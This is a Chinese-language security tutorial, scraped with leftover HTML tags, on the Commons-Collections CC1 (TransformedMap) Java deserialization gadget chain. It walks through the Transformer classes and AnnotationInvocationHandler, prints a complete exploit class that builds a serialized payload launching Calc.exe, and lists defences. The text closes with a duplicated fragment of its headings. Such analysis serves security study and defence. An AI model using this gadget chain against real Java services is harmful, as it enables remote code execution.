Java反序列化漏洞分析：CC1链TransformedMap版<\/h1>

一、前置知识<\/h2>

1. 序列化与反序列化<\/h3>

序列化<\/strong>：将Java对象转换为字节序列(byte[])，用于保存到磁盘或通过网络传输。<\/p>

序列化注意事项：<\/p>

必须实现Serializable<\/code>接口<\/li>
被transient<\/code>修饰的属性不会被序列化<\/li> <\/ul> 示例代码：<\/p> import<\/span> java.io.*;<\/span> <\/span><\/span>class<\/span> User<\/span> implements<\/span> Serializable {<\/span> <\/span><\/span> String name;<\/span> <\/span><\/span> int<\/span> age;<\/span> <\/span><\/span> public<\/span> User<\/span>(<\/span>String name,<\/span> int<\/span> age)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>name<\/span> =<\/span> name;<\/span> <\/span><\/span> this<\/span>.<\/span>age<\/span> =<\/span> age;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span>public<\/span> class<\/span> SerializeDemo<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> User user =<\/span> new<\/span> User(<\/span>"Alice"<\/span>,<\/span> 23<\/span>);<\/span> <\/span><\/span> ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"user.ser"<\/span>));<\/span> <\/span><\/span> out.<\/span>writeObject<\/span>(<\/span>user);<\/span> <\/span><\/span> out.<\/span>close<\/span>();<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"对象已序列化"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>反序列化<\/strong>：将序列化后的字节序列转换回Java对象的过程。<\/p> 示例代码：<\/p> public<\/span> class<\/span> DeserializeDemo<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"user.ser"<\/span>));<\/span> <\/span><\/span> User user =<\/span> (<\/span>User)<\/span> in.<\/span>readObject<\/span>();<\/span> \/\/ 反序列化过程 <\/span><\/span><\/span><\/span> in.<\/span>close<\/span>();<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"对象已反序列化"<\/span>);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"姓名: "<\/span> +<\/span> user.<\/span>name<\/span>);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"年龄: "<\/span> +<\/span> user.<\/span>age<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>二、环境准备<\/h2> JDK版本：jdk8u65<\/li> Maven版本：3.6.3<\/li> Commons-Collections版本：3.2.1<\/li> <\/ul> 注意<\/strong>：高版本JDK和Commons-Collections已修复此漏洞。<\/p> 三、关键Transformer类分析<\/h2> 1. InvokerTransformer类<\/h3> 反射执行的核心类，是漏洞利用链的起点。<\/p> 构造函数：<\/p> public<\/span> InvokerTransformer<\/span>(<\/span>String methodName,<\/span> Class[]<\/span> paramTypes,<\/span> Object[]<\/span> args)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>iMethodName<\/span> =<\/span> methodName;<\/span> <\/span><\/span> this<\/span>.<\/span>iParamTypes<\/span> =<\/span> paramTypes;<\/span> <\/span><\/span> this<\/span>.<\/span>iArgs<\/span> =<\/span> args;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>transform方法：<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>this<\/span>.<\/span>iMethodName<\/span>,<\/span> this<\/span>.<\/span>iParamTypes<\/span>);<\/span> <\/span><\/span> return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> this<\/span>.<\/span>iArgs<\/span>);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. ConstantTransformer类<\/h3> 构造函数：<\/p> public<\/span> ConstantTransformer<\/span>(<\/span>Object constantToReturn)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>iConstant<\/span> =<\/span> constantToReturn;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>transform方法：<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> return<\/span> this<\/span>.<\/span>iConstant<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. ChainedTransformer类<\/h3> 构造函数：<\/p> public<\/span> ChainedTransformer<\/span>(<\/span>Transformer[]<\/span> transformers)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>iTransformers<\/span> =<\/span> transformers;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>transform方法：<\/p> public<\/span> Object transform<\/span>(<\/span>Object object)<\/span> {<\/span> <\/span><\/span> for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> this<\/span>.<\/span>iTransformers<\/span>.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span> <\/span><\/span> object =<\/span> this<\/span>.<\/span>iTransformers<\/span>[<\/span>i].<\/span>transform<\/span>(<\/span>object);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> object;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、漏洞利用链构建<\/h2> 1. 基本思路<\/h3> 从InvokerTransformer<\/code>的transform<\/code>方法出发，寻找调用链：<\/p> 寻找调用transform<\/code>方法的地方<\/li> 寻找可以传入InvokerTransformer<\/code>作为参数的点<\/li> 最终找到readObject<\/code>反序列化入口<\/li> <\/ol> 2. TransformedMap利用<\/h3> TransformedMap<\/code>的checkSetValue<\/code>方法调用了transform<\/code>方法：<\/p> protected<\/span> Object checkSetValue<\/span>(<\/span>Object value)<\/span> {<\/span> <\/span><\/span> return<\/span> this<\/span>.<\/span>valueTransformer<\/span>.<\/span>transform<\/span>(<\/span>value);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>valueTransformer<\/code>通过构造函数传入：<\/p> protected<\/span> TransformedMap<\/span>(<\/span>Map map,<\/span> Transformer keyTransformer,<\/span> Transformer valueTransformer)<\/span> {<\/span> <\/span><\/span> super<\/span>(<\/span>map);<\/span> <\/span><\/span> this<\/span>.<\/span>keyTransformer<\/span> =<\/span> keyTransformer;<\/span> <\/span><\/span> this<\/span>.<\/span>valueTransformer<\/span> =<\/span> valueTransformer;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>通过decorate<\/code>静态方法创建TransformedMap<\/code>：<\/p> public<\/span> static<\/span> Map decorate<\/span>(<\/span>Map map,<\/span> Transformer keyTransformer,<\/span> Transformer valueTransformer)<\/span> {<\/span> <\/span><\/span> return<\/span> new<\/span> TransformedMap(<\/span>map,<\/span> keyTransformer,<\/span> valueTransformer);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>checkSetValue<\/code>被AbstractInputCheckedMapDecorator.MapEntry.setValue<\/code>调用：<\/p> public<\/span> Object setValue<\/span>(<\/span>Object value)<\/span> {<\/span> <\/span><\/span> value =<\/span> this<\/span>.<\/span>parent<\/span>.<\/span>checkSetValue<\/span>(<\/span>value);<\/span> <\/span><\/span> return<\/span> this<\/span>.<\/span>entry<\/span>.<\/span>setValue<\/span>(<\/span>value);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. AnnotationInvocationHandler利用<\/h3> AnnotationInvocationHandler<\/code>的readObject<\/code>方法中调用了setValue<\/code>方法：<\/p> private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream var1)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> var1.<\/span>defaultReadObject<\/span>();<\/span> <\/span><\/span> AnnotationType var2 =<\/span> null<\/span>;<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> for<\/span> (<\/span>Map.<\/span>Entry<\/span> var5 :<\/span> this<\/span>.<\/span>memberValues<\/span>.<\/span>entrySet<\/span>())<\/span> {<\/span> <\/span><\/span> String var6 =<\/span> (<\/span>String)<\/span>var5.<\/span>getKey<\/span>();<\/span> <\/span><\/span> Class var7 =<\/span> (<\/span>Class)<\/span>var2.<\/span>memberTypes<\/span>().<\/span>get<\/span>(<\/span>var6);<\/span> <\/span><\/span> if<\/span> (<\/span>var7 !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> Object var8 =<\/span> var5.<\/span>getValue<\/span>();<\/span> <\/span><\/span> if<\/span> (!<\/span>var7.<\/span>isInstance<\/span>(<\/span>var8)<\/span> &&<\/span> !(<\/span>var8 instanceof<\/span> ExceptionProxy))<\/span> {<\/span> <\/span><\/span> var5.<\/span>setValue<\/span>((<\/span>new<\/span> AnnotationTypeMismatchExceptionProxy(<\/span>var8.<\/span>getClass<\/span>()<\/span> +<\/span> "["<\/span> +<\/span> var8 +<\/span> "]"<\/span>)).<\/span>setMember<\/span>((<\/span>Method)<\/span>var2.<\/span>members<\/span>().<\/span>get<\/span>(<\/span>var6)));<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>五、完整利用链构建<\/h2> 1. 解决Runtime类不可序列化问题<\/h3> Runtime<\/code>类未实现Serializable<\/code>接口，改用Runtime.class<\/code>（Class<\/code>对象实现了Serializable<\/code>）。<\/p> 2. 构建ChainedTransformer<\/h3> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}<\/span> <\/span><\/span> ),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}<\/span> <\/span><\/span> ),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"Calc.exe"<\/span>}<\/span> <\/span><\/span> )<\/span> <\/span><\/span>};<\/span> <\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span><\/code><\/pre>3. 构造完整利用链<\/h3> public<\/span> class<\/span> TransTest3<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}<\/span> <\/span><\/span> ),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}<\/span> <\/span><\/span> ),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"Calc.exe"<\/span>}<\/span> <\/span><\/span> )<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> <\/span><\/span> Map innermap =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> innermap.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "value"<\/span>);<\/span> <\/span><\/span> Map outermap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>innermap,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span> <\/span><\/span> <\/span><\/span> Class cl =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span> Constructor cst =<\/span> cl.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span> cst.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object exp =<\/span> cst.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> outermap);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化 <\/span><\/span><\/span><\/span> FileOutputStream fos =<\/span> new<\/span> FileOutputStream(<\/span>"payload.bin"<\/span>);<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>fos);<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>exp);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 反序列化触发 <\/span><\/span><\/span><\/span> FileInputStream fis =<\/span> new<\/span> FileInputStream(<\/span>"payload.bin"<\/span>);<\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>fis);<\/span> <\/span><\/span> Object result =<\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> ois.<\/span>close<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4. 关键点说明<\/h3> 使用Target.class<\/code>作为注解类型，因为它有value<\/code>属性<\/li> innermap.put("value", "value")<\/code>确保能通过memberTypes.get(name)<\/code>检查<\/li> TransformedMap.decorate<\/code>创建包含恶意Transformer<\/code>的Map<\/li> 通过反射创建AnnotationInvocationHandler<\/code>实例<\/li> <\/ol> 六、漏洞利用链流程总结<\/h2> 反序列化触发AnnotationInvocationHandler.readObject<\/code><\/li> readObject<\/code>中遍历memberValues<\/code>并调用setValue<\/code><\/li> setValue<\/code>调用TransformedMap.checkSetValue<\/code><\/li> checkSetValue<\/code>调用ChainedTransformer.transform<\/code><\/li> ChainedTransformer<\/code>依次执行： ConstantTransformer<\/code>返回Runtime.class<\/code><\/li> InvokerTransformer<\/code>调用getMethod("getRuntime")<\/code><\/li> InvokerTransformer<\/code>调用invoke(null)<\/code>获取Runtime<\/code>实例<\/li> InvokerTransformer<\/code>调用exec("Calc.exe")<\/code>执行命令<\/li> <\/ul> <\/li> <\/ol> 七、防御措施<\/h2> 升级Commons-Collections到安全版本<\/li> 使用JDK高版本（已修复此漏洞）<\/li> 对反序列化操作进行白名单控制<\/li> 使用安全框架如SerialKiller进行防护<\/li> <\/ol> 八、学习建议<\/h2> 使用调试工具逐步跟踪调用链<\/li> 重点关注transform<\/code>和readObject<\/code>方法的调用关系<\/li> 理解Java反射机制和动态代理<\/li> 研究其他反序列化漏洞利用链（如CC6、CC7等）<\/li> <\/ol>

Java反序列化漏洞分析：CC1链TransformedMap版<\/h1>

一、前置知识<\/h2>

四、漏洞利用链构建<\/h2>

五、完整利用链构建<\/h2>

1. 解决Runtime类不可序列化问题<\/h3>
`Runtime<\/code>类未实现Serializable<\/code>接口，改用Runtime.class<\/code>（Class<\/code>对象实现了Serializable<\/code>）。<\/p>`

八、学习建议<\/h2>

使用调试工具逐步跟踪调用链<\/li>
重点关注`transform<\/code>和readObject<\/code>方法的调用关系<\/li>`
`理解Java反射机制和动态代理<\/li>`
`研究其他反序列化漏洞利用链（如CC6、CC7等）<\/li> <\/ol>`